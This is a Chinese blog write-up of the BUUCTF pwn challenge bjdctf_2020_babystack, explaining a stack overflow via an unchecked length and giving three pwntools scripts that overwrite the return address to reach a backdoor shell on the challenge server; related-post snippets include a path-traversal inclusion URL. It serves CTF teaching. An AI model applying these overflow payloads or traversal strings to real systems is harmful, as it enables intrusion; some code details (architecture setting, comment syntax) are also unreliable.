【CTF】BUUCTF-bjdctf_2020_babystack1

最新推荐文章于 2023-06-21 18:34:21 发布
最新推荐文章于 2023-06-21 18:34:21 发布
阅读量356 收藏 2
点赞数 3
分类专栏: PWN 文章标签: 网络安全 c# python Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53394081/article/details/129360447
版权

buu bjdctf_2020_babystack

程序分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
    
  //scanf来输入一个数字,把这个数字作为之后read中的数据MAX大小
    
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);  
    
  //fd:文件描述符,用来指向要操作的文件的文件结构体
  //buf:一块内存空间
  //count:希望读取的字节数,这里nbyte就是count,同时这里nbyte是无符号整形,能进行整形溢出
  //无符号整数,在无符号整数出现变化的时候,会出现整数溢出
    
  return 0;
}

   //运行的时候,会有两次输入,第一次输入nbytes,之后第二次输入的截取你nbytes个,之后就继续往下找/bin/sh的位置

解题思路

寻找合适偏移量

从buf开始写入数据,要先把原本的数据填满,buf那里的数据填满需要10个字节,之后覆盖掉ret,需要额外用8个字节,所以是0x10+0x08

找/bin/sh

  • 这里找字符串可以直接用shift+F12去找,找函数地址可以直接在ida左侧地址栏寻找,或者ROPgadget都行

  • 话说text段是代码段,data段是数据段,要找函数地址比如system,backdoor可以去代码段找,想找字符串比如system参数/bin/sh时,就得去数据段data找

  • backdoor函数地址

  • /bin/sh地址

  • ps:当然,这里地址也可以直接在python中一步步找

在python3中输入
from pwn import*
io = ()
elf =ELF()
elf.symbols["backdoor"]

EXP

解法一
from pwn import*
p = remote('node4.buuoj.cn',29028)
sys = 0x4006E6   //0x4006EA也可以
//elf = ELF()
//backdoor = elf.symbols["backdoor"]
p.sendlineafter("[+]Please input the length of your name:",'200')
payload =b'a'*(0x10+0x8) + p64(sys)
p.sendlineafter("[+]What's u name?",payload)
p.interactive()
解法二

  • 因为本题中nbytes是一个无符号数,因此可以输入一个-1来得到一个很大的数

from pwn import*
p = remote('node4.buuoj.cn',29028)
context(os = 'linux',arch = 'arm64',log_level = 'debug')
payload = b'a'*(0x10+0x8) + p64(0x4006E6)   //改成4006EA这里就打不通了哦
p.recv()
p.sendline(b'-1')
p.recv()
p.sendline(payload)
p.interactive()

  • 解法二的另一种姿势

from pwn import*
p = remote('node4.buuoj.cn',29028)
context(os = 'linux',arch = 'arm64',log_level = 'debug')
payload = b'a'*(0x10+0x8) + p64(0x4006E6)
p.sendlineafter("[+]Please input the length of your name:",b'-1')
p.sendlineafter("[+]What's u name?",payload)
p.interactive()

初次发文,很多地方做的不足,还望各位大佬多多指点

ksw0rd
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Solyd_2019
02-11
CTF 2019 Solyd Resoluçãoda CTF de 2019 da
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
亚信java笔试题 BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native container 环境下 build 和 run web Schrödinger - imagin tags: 查看源码 时间戳 修改cookie 打开网页,发现是个 login fucker,推测题目的意思是找一个能 fuck 的 login page,查看源码发现有一行白色的字体不显示,提示有 test.php,访问发现是个登录框。将 http://localhost/test.php 提交,发现网站貌似开始了爆破,但是爆破成功率却涨的很慢。查看 cookie 发现有个 base64 的 cookie 很可疑,decode 一下发现是提交时的时间戳。 将该 cookie 直接置空,刷新页面就发现成功率接近百分之百,check 一下得到爆破的结果. 通过 av 号在 b 站找到对应的视频,根据
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTFbjdctf_2020_babystack 1
凉水的博客
01-21 1240
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
bjdctf_2020_babystack 1
CYXMDTT的博客
03-22 297
发现scanf会读入一个输入的数,赋值给nbytes ,之后read读取nbytes大小的字符,说明我们可以溢出任意长度。之后在Functions name处可发现后门函数backdoor。用checksec查看,发现开启了NX保护。执行完程序后用64位IDA进行分析。运行它直接拿到shell。
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 631
[buuctf]bjdctf_2020_babystack
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 343
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
bjdctf_2020_babystack
weixin_56301399的博客
07-23 256
虽然只是一道基础的栈溢出题目,我其实很激动,因为其他的博客里我多多少少是参照了其他大佬的思维,这道题,也算证明了菜狗子的训练是有效的,起码碰到类似的题目也可以尝试做了。嘻嘻,加油吧。......
KWA_Write-UP-CTF_Muhammad-Irsyad-Ali_05311840000041
03-18
KWA_编写UP CTF_穆罕默德·艾尔西德·阿里_05311840000041 Dokumentasi CTF-穆罕默德·伊尔萨德·阿里(Muhammad Irsyad Ali) 问题清单 UTCTF 2021 初学者 完整性检查1.说明您可以在#announcements频道的说明中找到该标志! 2.标志utflag {welcome_to_utctf}![替代文字]()3.解决方案Dengan bergabung不和谐UTCTF,接受条款和条件pada文本通道*欢迎*,lalu melihat deskripsi pada文本通道*公告*棘手的事情1.说明(TBD)3.标志(TBD)5.解决方案(TBD)密码手套1.说明2.标志3.解决方案魔术字节1.说明2.标志3.解决方案HTML 1.说明2.标志3.解决方案 法证 网页 DvCTF 2021 Stega 皮迪耶夫1.说明
BUU刷题-Pwn-bjdctf_2020_babystack
最新发布
一个啥也不会的小菜鸡!
06-21 183
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
bjdctf_2020_babystack题解
OrientalGlass的博客
01-08 329
send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 276
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 285
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
bjdctf2020 babystack
pondzhang的专栏
05-08 342
from pwn import * p = process('./bjdctf_2020_babystack') p.recvuntil("length of your name:\n") p.sendline('1024') p.recvuntil("What's u name?\n") payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值